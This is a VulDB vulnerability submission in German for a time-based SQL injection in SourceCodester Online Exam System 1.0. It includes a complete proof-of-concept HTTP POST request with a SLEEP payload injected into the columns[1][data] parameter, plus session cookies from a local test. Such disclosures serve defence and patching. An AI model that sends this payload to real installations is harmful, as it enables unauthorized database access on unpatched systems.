Submit #157662: SQL Injection in jurusanmatkul/data SOURCECODESTER Online Exam Systeminfo

TitelSQL Injection in jurusanmatkul/data SOURCECODESTER Online Exam System
BeschreibungSQL Injection in jurusanmatkul/data SOURCECODESTER Online Exam System Product: Online Exam System Version: 1.0 Source: https://www.sourcecodester.com/php-codeigniter-online-exam-system-free-source-code PoC: https://github.com/tht1997/CVE_2023/blob/main/online_exam/jurusanmatkul.md param vuln: columns[1][data] Request: POST /ci_exam/jurusanmatkul/data HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 1320 Origin: http://localhost Connection: close Referer: http://localhost/ci_exam/jurusanmatkul Cookie: remember_me_name=bMGFrQaFzDhuoLmztZCT; remember_me_pwd=YMSm3Q2wFDHaHLQ5eZPKc42oU7CaK8IlA%40q1; remember_me_lang=en; Hm_lvt_c790ac2bdc2f385757ecd0183206108d=1680329430; Hm_lvt_5320b69f4f1caa9328dfada73c8e6a75=1680329567; PowerBB_username=xss; PowerBB_password=8879f85d0170cba2a4328bbb5a457c6a; menu_contracted=false; __atuvc=1%7C16; csrf_cookie_name=3fd6bdc3c3bf1def2928d40ade568742; ci_session=41rk6lp81hc9sev9g6tpin5rlc3n9ppf Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin csrf_test_name=3fd6bdc3c3bf1def2928d40ade568742&draw=1&columns%5B0%5D%5Bdata%5D=id&columns%5B0%5D%5Bname%5D=&columns%5B0%5D%5Bsearchable%5D=false&columns%5B0%5D%5Borderable%5D=false&columns%5B0%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B0%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B1%5D%5Bdata%5D=nama_matkul%20AND%20%28SELECT%207804%20FROM%20%28SELECT%28SLEEP%2813%29%29%29osdd%29&columns%5B1%5D%5Bname%5D=&columns%5B1%5D%5Bsearchable%5D=true&columns%5B1%5D%5Borderable%5D=true&columns%5B1%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B1%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B2%5D%5Bdata%5D=nama_jurusan&columns%5B2%5D%5Bname%5D=&columns%5B2%5D%5Bsearchable%5D=false&columns%5B2%5D%5Borderable%5D=false&columns%5B2%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B2%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B3%5D%5Bdata%5D=id_matkul&columns%5B3%5D%5Bname%5D=&columns%5B3%5D%5Bsearchable%5D=false&columns%5B3%5D%5Borderable%5D=false&columns%5B3%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B3%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B4%5D%5Bdata%5D=id_matkul&columns%5B4%5D%5Bname%5D=&columns%5B4%5D%5Bsearchable%5D=true&columns%5B4%5D%5Borderable%5D=true&columns%5B4%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B4%5D%5Bsearch%5D%5Bregex%5D=false&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=asc&start=0&length=10&search%5Bvalue%5D=&search%5Bregex%5D=false
Quelle⚠️ https://www.sourcecodester.com/php-codeigniter-online-exam-system-free-source-code
Benutzer
 huutuanbg97 (UID 45015)
Einreichung17.05.2023 15:54 (vor 3 Jahren)
Moderieren17.05.2023 18:50 (3 hours later)
StatusAkzeptiert
VulDB Eintrag229277 [SourceCodester Online Exam System 1.0 /jurusanmatkul/data columns[1][data] SQL Injection]
Punkte17

ZurückÜbersichtWeiter

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!